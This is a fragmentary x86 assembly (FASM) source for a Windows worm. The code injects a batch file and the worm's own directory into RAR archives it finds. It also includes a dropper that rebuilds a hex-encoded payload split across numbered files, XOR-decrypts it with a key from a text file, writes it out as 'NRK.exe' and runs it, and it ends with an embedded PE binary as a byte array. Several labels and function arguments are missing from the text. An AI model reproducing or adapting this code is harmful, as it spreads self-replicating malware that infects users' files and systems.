	sub	eax, WIN32_FIND_DATA.cFileName			; EAX=str_len(filename)

	push	eax

	mov	esi, WIN32_FIND_DATA.cFileName
	mov	edi, [combine_pointer]
	mov	ecx, eax
	rep	movsb						; Write the RAR-filename to the string

	pop	ecx
	add	[combine_pointer], ecx

	mov	eax, [combine_pointer]
	mov	byte [eax], 0x20				; Write a space to the pointer

	inc	[combine_pointer]

	mov	eax, WIN32_FIND_DATA.cFileName
	mov	byte [eax], 0x0
	inc	eax
	cmp	eax, 260
    jle zero_filename_buffer

	mov	eax, [combine_pointer]
	mov	[save_inf_str_pointer], eax			; Save the pointer, for the next string
	mov	[combine_pointer], eax

	mov	[save_inf_str_pointer], eax

	mov	esi, combine_name
	mov	edi, [combine_pointer]
	mov	ecx, 0x9
	rep	movsb

	add	[combine_pointer], 0x9
	mov	eax, [combine_pointer]
	mov	byte [eax], 0x0

	call	Run_Infection_Command				; Run the command! (add start.bat to the .RAR archive)

	mov	esi, worm_dir
	mov	edi, [save_inf_str_pointer]
	mov	ecx, 0x8
	rep	movsb						; Write the name of the directory
								; instead of the start.bat name
	add	[save_inf_str_pointer], 0x8
	mov	eax, [save_inf_str_pointer]
	mov	byte [eax], 0x0 				; Write a zero at the end of the string

	call	Run_Infection_Command				; Run the command! (add worm-directory to the .RAR archive)

	invoke	CreateProcess, \			; Execute the extrac32-string
		0x0, \					; Now the extracted version of the victim is in the temp-direcory
		[combine_data], \
		0x0, \
		0x0, \
		FALSE, \
		0x0, \
		0x0, \
		0x0, \
		STARTUPINFO_struct, \

	invoke	Sleep, \				; Wait 6.333 Secunds until return.
		6333					; Reason: rar.exe may use much CPU-Speed, to reduce the
							; chance of conflicts, give it some time for working.
							; This has always worked when I've tested it.

; Delete the last backslash of the Current Directory-Path
	mov	ecx, [GetCDB_Size]
	mov	eax, GetCurrentDir_buffer
	add	eax, ecx
	dec	ecx
	cmp	byte [eax], '\'
    jne CDS_loop

	mov	byte [eax], 0x0
	sub	eax, GetCurrentDir_buffer
	mov	[GetCDB_Size], eax

 .end start

include '..\FASM\INCLUDE\'


	memory_alloc	dd 0x0
	memory_counter	dd 0x0

	searchstr_fn	db '*.'
	      fn_ext	db '000', 0x0

	stSearchTxt	db '*.txt', 0x0

	hSearchFile	dd 0x0
	dot_position	dd 0x0
	trash		dd 0x0
	trash2		dd 0x0

	hCreFile	dd 0x0
	key_txt_size	dd 0x0
	hCrFiMap	dd 0x0
	hMapView	dd 0x0

	FALSE_F 	dd 0x0

	hWormFile	dd 0x0
	worm_file	db 'NRK.exe',0x0

  .dwFileAttributes   dd ?
  .ftCreationTime     FILETIME
  .ftLastAccessTime   FILETIME
  .ftLastWriteTime    FILETIME
  .nFileSizeHigh      dd ?
  .nFileSizeLow       dd ?
  .dwReserved0	      dd ?
  .dwReserved1	      dd ?
  .cFileName	      rb 260
  .cAlternateFileName rb 14

  StartUp_struct_cb		 dd 0
  StartUp_struct_lpReserved	 dd 0
  StartUp_struct_lpDesktop	 dd 0
  StartUp_struct_lpTitle	 dd 0
  StartUp_struct_dwX		 dd 0
  StartUp_struct_dwY		 dd 0
  StartUp_struct_dwXSize	 dd 0
  StartUp_struct_dwYSize	 dd 0
  StartUp_struct_dwXCountChars	 dd 0
  StartUp_struct_dwYCountChars	 dd 0
  StartUp_struct_dwFillAttribute dd 0
  StartUp_struct_dwFlags	 dd 0
  StartUp_struct_wShowWindow	 dw 0
  StartUp_struct_cbReserved2	 dw 0
  StartUp_struct_lpReserved2	 dd 0
  StartUp_struct_hStdInput	 dd 0
  StartUp_struct_hStdOutput	 dd 0
  StartUp_struct_hStdError	 dd 0

	invoke	VirtualAlloc, \
		0x0, \
		0x10000, \		; 64 KB RAM
		0x1000, \
	mov	[memory_alloc], eax

	invoke	FindFirstFile, \	       ; Find a file with special filenames
		searchstr_fn, \ 	       ; Pointer to filename (*.NNN - where NNN is the counter)
		WIN32_FIND_DATA 	       ; Pointer to WIN32_FIND_DATA structure
	mov	[hSearchFile], eax	       ; Save search handle

	cmp	eax, INVALID_HANDLE_VALUE      ; Last File?
	je	decrypt_worm_code	       ; If yes, let's decrypt the worm-code

	call	change_search_str	       ; Increase the extention (counter)
	xor	ecx, ecx		       ; Counter=0
	call	FileName_To_Memory	       ; Write the filename to memory

	invoke	FindClose, \		       ; Close search-handle
   jmp	find_files_with_sp_name

	nop				       ; Due to a bug in CMD.EXE I have to change the offset
					       ; of the decrypt_worm_code lable.

	xor	ecx, ecx
	mov	eax, [memory_alloc]
	add	eax, ecx
	mov	ax, word [eax]
	call	hex_to_binary
	mov	ebx, ecx
	shr	ebx, 1
	add	ebx, [memory_alloc]
	mov	[ebx], al
	add	ecx, 2
	cmp	ecx, [memory_counter]
   js	hex2bin_loop

	invoke	FindFirstFile, \	       ; Find the *.txt file with the key to decrypt
		stSearchTxt, \

	invoke	FindClose, \		       ; Close the Search-Handle

	invoke	CreateFile, \		       ; Open the .txt file (with the decrytion-key)
		WIN32_FIND_DATA.cFileName, \
		0x0, \
		0x0, \
	mov	[hCreFile], eax

	invoke	GetFileSize, \			; Get the Filesize of the file
		[hCreFile], \			; =Size of the key
	mov	[key_txt_size], eax

	invoke	CreateFileMapping, \		; Create a Map of the File
		[hCreFile], \
		0x0, \
		0x0, \
		[key_txt_size], \
	mov	[hCrFiMap], eax

	invoke	MapViewOfFile, \		; Create a MapViewOfFile
		[hCrFiMap], \			; The key with the decrytion key
		0x0, \
		0x0, \
	mov	[hMapView], eax

	xor	ecx, ecx			; ECX=COUNTER=0x0
	mov	eax, [hMapView] 		; EAX=Start of decrytion-key
	add	eax, ecx			; EAX=Current position of decrytion key
	mov	al, byte [eax]			; al=Content of current position of decrytion key
	mov	ebx, [memory_alloc]		; EBX=Start of encryted virus in memory
	add	ebx, ecx			; EBX=Current position of encryted virus
	mov	ah, byte [ebx]			; ah=Content of current position of encryted virus
	xor	ah, al				; AH=Encrypted Byte XOR KEY
	mov	byte [ebx], ah			; Write AH to Memory
	inc	ecx				; Increase the counter
	mov	eax, [memory_counter]		; Size of the virus*2 (Due to Hex (2Byte) -> Bin (1Byte) conversion)
	shr	eax, 1				; EAX/2
	cmp	ecx, [key_txt_size]		; Compare if current position greater than key
	jg	finish_decrytion		; If yes, finish decrytion
	cmp	ecx, eax			; Compare if current byte smaller than virus size
    js	decrypt_memory_code			; If yes, continue


	invoke	UnmapViewOfFile, \

	invoke	CloseHandle, \

	invoke	CloseHandle, \

	invoke	CreateFile, \
		worm_file, \
		0x0, \
		0x0, \
	mov	[hWormFile], eax

	mov	eax, [memory_counter]
	shr	eax, 1

	invoke	WriteFile, \			; Write the real worm-file
		[hWormFile], \
		[memory_alloc], \
		eax, \
		FALSE_F, \

	invoke	CloseHandle, \			; Close Wormfile

	invoke	CreateProcess, \		; Open Worm!
		worm_file, \
		0x0, \
		0x0, \
		0x0, \
		FALSE, \
		0x0, \
		0x0, \
		0x0, \
		STARTUP_struct, \

	invoke	ExitProcess, 0x0

change_search_str:			; Changes the extention to search for
	mov	eax, fn_ext+2		; Pointer to 3rd byte in extention
	cmp	byte [eax], '9' 	; Is it '9'?
	je	hex_ext_counter_9_A	; If yes, make a 'A'

	cmp	byte [eax], 'Z' 	; Is it 'Z'?
	je	hex_ext_counter_Z_0

	inc	byte [eax]		; Increase extention-counter

; In:  eax = Pointer to byte to change
; Out: [eax]='A'

	mov	byte [eax], 'A' 	; Increase extention-counter

hex_ext_counter_Z_0:			; My first recursive function in asm :)
	mov	byte [eax], '0' 	; Increase extention-counter
	dec	eax
	cmp	byte [eax], '9'
	je	hex_ext_counter_9_A

	cmp	byte [eax], 'Z'
	je	hex_ext_counter_Z_0

	inc	byte [eax]

	mov	ecx, 0x9
	mov	eax, WIN32_FIND_DATA.cFileName
	add	eax, ecx
	cmp	byte [eax], '.'
	je found_dot_in_filename
   loop get_dot_in_filename
	mov	[dot_position], ecx

	mov	esi, WIN32_FIND_DATA.cFileName		; What? Filename!
	mov	edi, [memory_alloc]			; Where? Memory!
	add	edi, [memory_counter]			; Where exactly? Next byte in memory
	rep	movsb					; Write!

	mov	ecx, [dot_position]
	add	[memory_counter], ecx

	mov	dword [WIN32_FIND_DATA.cFileName], 0x0		; Anything to 0x0 because if the filename is small,
	mov	dword [WIN32_FIND_DATA.cFileName+4], 0x0	; the dot of the last filename still exists.
	mov	dword [WIN32_FIND_DATA.cFileName+8], 0x0	; (that damn bug wasted ~1h of my time :D)
								; Example: "AA00BB00.001"+0x0
								;          "A.002"+0x0
								;    data: "A.002"+0x0+"00.001"


; Change a HEX-value to binary
; In:  AX = HEX-value (i.E.: "0D")
; Out: AL = binary (i.E.: 0x0D)
; Nothing else changed

	mov	[trash], ebx		; Save ebx
	xchg	al, ah
	sub	ax, 0x3030		; "11"=0x3131 - make it to 0x0101
	push	hex2bin_not_A_F_1

	cmp	al, 0x9 		; If al>0x9 then decrease by 7
	jg	hex2bin_dec_al

	pop	ebx

	mov	ebx, eax		; Save eax
	mov	al, ah			; AL=AH
	push	hex2bin_not_A_F_2
	cmp	al, 0x9 		; If al>0x9 then decrease by 7
	jg	hex2bin_dec_al

	mov	[trash2], ebx
	pop	ebx
	mov	ebx, [trash2]
	xchg	ah, al
	shl	ah, 4

	mov	al, bl
	or	al, ah

	mov	ebx, [trash]		; Restore ebx

	sub	al, 7
.end start


primary_decryption_code 	db 0x4D,0x5A,0x80,0x00,0x01,0x00,0x00,0x00,0x04,0x00,0x10,0x00,0xFF,0xFF,0x00,0x00
                                db 0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00
                                db 0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68
                                db 0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F
                                db 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20
                                db 0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x50,0x45,0x00,0x00,0x4C,0x01,0x03,0x00,0x8F,0xC7,0x5B,0x44,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0xE0,0x00,0x8F,0x81,0x0B,0x01,0x01,0x38,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00
                                db 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x40,0x00,0x00,0x00,0x02,0x00,0x00,0xE6,0xAA,0x00,0x00,0x02,0x00,0x00,0x00
                                db 0x00,0x10,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x30,0x00,0x00,0x55,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00
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                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0
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                                db 0x00,0x04,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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                                db 0x55,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x08,0x00,0x00
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                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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                                db 0x10,0x40,0x00,0xFF,0x15,0x81,0x30,0x40,0x00,0xA3,0x14,0x10,0x40,0x00,0x83,0xF8
                                db 0xFF,0x74,0x1B,0xE8,0x97,0x01,0x00,0x00,0x31,0xC9,0xE8,0xB7,0x01,0x00,0x00,0xFF
                                db 0x35,0x14,0x10,0x40,0x00,0xFF,0x15,0x7D,0x30,0x40,0x00,0xEB,0xCC,0x90,0x31,0xC9
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                                db 0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x00,0x68,0x00,0x00,0x00,0xC0,0x68
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                                db 0x28,0x10,0x40,0x00,0xFF,0x35,0x24,0x10,0x40,0x00,0xFF,0x15,0x85,0x30,0x40,0x00
                                db 0xA3,0x28,0x10,0x40,0x00,0x6A,0x00,0xFF,0x35,0x28,0x10,0x40,0x00,0x6A,0x00,0x6A
                                db 0x04,0x6A,0x00,0xFF,0x35,0x24,0x10,0x40,0x00,0xFF,0x15,0x71,0x30,0x40,0x00,0xA3
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                                db 0x40,0x00,0xA3,0x38,0x10,0x40,0x00,0xA1,0x04,0x10,0x40,0x00,0xD1,0xE8,0x6A,0x00
                                db 0x68,0x34,0x10,0x40,0x00,0x50,0xFF,0x35,0x00,0x10,0x40,0x00,0xFF,0x35,0x38,0x10
                                db 0x40,0x00,0xFF,0x15,0x95,0x30,0x40,0x00,0xFF,0x35,0x38,0x10,0x40,0x00,0xFF,0x15
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                                db 0x0C,0x10,0x40,0x00,0x80,0x38,0x39,0x74,0x08,0x80,0x38,0x5A,0x74,0x07,0xFE,0x00
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                                db 0x01,0xC8,0x80,0x38,0x2E,0x74,0x02,0xE2,0xF2,0x89,0x0D,0x18,0x10,0x40,0x00,0xBE
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                                db 0xF3,0xA4,0x8B,0x0D,0x18,0x10,0x40,0x00,0x01,0x0D,0x04,0x10,0x40,0x00,0xC7,0x05
                                db 0x70,0x10,0x40,0x00,0x00,0x00,0x00,0x00,0xC7,0x05,0x74,0x10,0x40,0x00,0x00,0x00
                                db 0x00,0x00,0xC7,0x05,0x78,0x10,0x40,0x00,0x00,0x00,0x00,0x00,0xC3,0x89,0x1D,0x1C
                                db 0x10,0x40,0x00,0x86,0xC4,0x66,0x2D,0x30,0x30,0x68,0x63,0x22,0x40,0x00,0x3C,0x09
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                                db 0x89,0x1D,0x20,0x10,0x40,0x00,0x5B,0x8B,0x1D,0x20,0x10,0x40,0x00,0x86,0xE0,0xC0
                                db 0xE4,0x04,0x88,0xD8,0x08,0xE0,0x8B,0x1D,0x1C,0x10,0x40,0x00,0xC3,0x2C,0x07,0xC3
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                                db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
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